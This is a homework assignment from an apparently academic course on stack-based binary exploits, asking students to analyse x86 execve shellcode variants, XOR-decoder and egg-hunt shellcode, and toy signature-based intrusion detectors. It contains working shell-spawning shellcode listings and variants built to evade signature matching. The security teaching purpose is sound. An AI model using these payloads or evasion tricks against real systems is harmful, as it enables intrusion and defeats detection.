SI485H: Stack Based Binary Exploits (SP17)


Home Policy Calendar Units Assignments Resources

HW 4: Shell Code Varients

Instructions

  • You must turn in a sheet of paper that is neatly typed or written answering the questions below. (You are strongly encouraged to type your homework.)
  • This homework is graded out of 130 points. Point values are associated to each question.

Questions

  1. Consider the following shell code as an improvement over previously described jmp-callback shell code

    SECTION .text
       global _start
    
    _start:
    
       xor eax,eax
    
       push eax ;\0
       push 0x68 ;h
       push 0x73 ;s
       push 0x2f ;/
       push 0x6e ;n
       push 0x69 ;i
       push 0x62 ;b
       push 0x2f ;/
    
       mov esi,esp
    
       xor edx,edx
       push edx
       push esi
    
       mov ecx,esp
       mov ebx,esi
       mov al,0xb
       int 0x80
    
    1. (5 points) This shell code fails to decrease the total number of bytes. Explain why? (You can compile and test against a jmp-callback variant)
    2. (5 points) This shell code also fails to launch a shell. Explain why?
    3. (5 points) Explain how to fix this shell code's push'es such that it will actually launch a shell.
    4. (5 points) When fixed, how many bytes is the shell code reduced by as compared to the jmp-callback shell code?
  2. Consider the following shell code

    SECTION .text
            global _start
    _start:
            xor ecx,ecx
            mul ecx ;MARK 1
    
            push eax
            push 0x68732f6e
            push 0x69622f2f
    
            mov ebx,esp ;MARK 2
            mov al,0xb
            int 0x80
    
    1. (5 points) At MARK 1, explain why mul ecx will zero out the register eax and edx.
    2. (5 points) At MARK 2, how come we are not creating an argv array for execve? What areguments are we passing instead?
    3. (5 points) How many bytes is this shell code?
  3. Consider the following shell code.

    SECTION .text
            global _start:
    
    _start:
            cltrd
            push 0xb
            pop eax
            push a
            pop ecx
            int 0x80
    
    1. (5 points) Provide an english-language description of the process of this shell code
    2. (5 points) Will this shell code work consistantly?
    3. (5 points) How would you use this shell code to launch a shell?
    4. (5 points) How many bytes is this shell code?
  4. (10 points) Go to the shell code repository on shell-storm

    http://shell-storm.org/shellcode/

    Choose a shell code from the Intel x86 header, compile and run that shell code, and describe it's properties and something interesting you learned from it. Be sure to include the code.

  5. Consider the simple signature matching instrusion detection scheme:

    int sig_check(char * p){
      for(;*p;p++)
        if (strncmp(p,"sh",2) == 0){
          return 1;
      return 0;
    }
    
    1. (5 points) Will the shell code below be detected by the signature scheme, yes or no and Explain.

      8048060: 31 c9            xor ecx,ecx
      8048062: f7 e1            mul ecx
      8048064: 50               push eax
      8048065: 68 6e 2f 73 68   push 0x68732f6e
      804806a: 68 2f 2f 62 69   push 0x69622f2f
      804806f: 89 e3            mov ebx,esp
      8048071: b0 0b            mov al,0xb
      8048073: cd 80            int 0x80
      
    2. (5 points) Will the shell code below be detected by the signature scheme, yes or no and Explain.

      8048060: 31 c9             xor ecx,ecx
      8048062: f7 e1             mul ecx
      8048064: 6a 68             push 0x68
      8048066: 68 6e 2f 2f 73    push 0x732f2f6e
      804806b: 68 2f 2f 62 69    push 0x69622f2f
      8048070: 89 e3             mov ebx,esp
      8048072: b0 0b             mov al,0xb
      8048074: cd 80             int 0x80
      
  6. Consider this signature matching scheme below:

    int sig_check(char *str, char * sig0, char *sig1){
      char *p;
      for(p=str;*p;p++){
        if ( strncmp(p,sig0,strlen(sig0)) == 0 )
          if (strncmp(p+strlen(sig0),sig1,strlen(sig1)) == 0)
            return 1;
        return 0;
      }
    }
    
    1. (5 points) Provide a signatures (i.e., arugments to sigcheck above) that will match both shell codes (from the previous questions) use of the excve system call.
    2. (5 points) Consider the following change to the shell code below, does your previous signature still work? If so, explain why, if not, explain why not.

      8048060: 31 c9             xor ecx,ecx
      8048062: f7 e1             mul ecx
      8048064: 6a 68             push 0x68
      8048066: 68 6e 2f 2f 73    push 0x732f2f6e
      804806b: 68 2f 2f 62 69    push 0x69622f2f
      8048070: b1 0b             mov cl,0xb
      8048072: 89 e3             mov ebx,esp
      8048074: 40                inc eax
      8048075: e2 fd             loop 8048074 <_start+0x14>
      8048077: cd 80             int 0x80
      
  7. (5 points) Does the shell code below match either (or both) of the signature schemes from the previous questions?

    8048060: 68 80 90 90 90  push 0x90909080
    8048065: 68 e3 b0 0b cd  push 0xcd0bb0e3
    804806a: 68 2f 62 69 89  push 0x8969622f
    804806f: 68 73 68 68 2f  push 0x2f686873
    8048074: 68 50 68 6e 2f  push 0x2f6e6850
    8048079: 68 31 c9 f7 e1  push 0xe1f7c931
    804807e: ff d4           call esp
    
  8. (5 points) What is polymorphic shell code? How does it relate to the shortcomins of the signature matching scheme from before?
  9. (5 points) What is decode shell code? Would decoder shell code be immune from signature matching schemes?
  10. Consider the following decode based shell code

    8048060: 68 6f 2e 3d 4e     push 0x4e3d2e6f
    8048065: 68 0c 0e a6 13     push 0x13a60e0c
    804806a: 68 c0 dc c4 57     push 0x57c4dcc0
    804806f: 68 9c d6 c5 f1     push 0xf1c5d69c
    8048074: 68 be d6 c3 f1     push 0xf1c3d6be
    8048079: 68 de 77 5a 3f     push 0x3f5a77de
    804807e: 31 c9              xor ecx,ecx
    8048080: 8b 04 0c           mov eax,DWORD PTR [esp+ecx*1]
    8048083: 35 ef be ad de     xor eax,0xdeadbeef
    8048088: 89 04 0c           mov DWORD PTR [esp+ecx*1],eax
    804808b: 80 c1 04           add cl,0x4
    804808e: 80 f9 14           cmp cl,0x14
    8048091: 7e ed              jle 8048080 <_start+0x20>
    8048093: ff e4              jmp esp
    
    1. (5 points) What is the decode key? Explain how you know this.
    2. (5 points) Why is the comparison (cmp) comapring to 0x14 for loop exit?
    3. (5 points) Explain the last instruction's relevance jmp esp.
  11. (5 points) In egg-hunt shell code, why should the egg appear twice?
  12. (5 points) Why do we use access() system call in egghunt shell code?
  13. (5 points) In the example below, why does the shell code being hunted for get loaded into memory?

    ./dummy_exploit $(printf $(./hexify.sh egg_hunt)) $(printf $(./hexify.sh huntable_shell))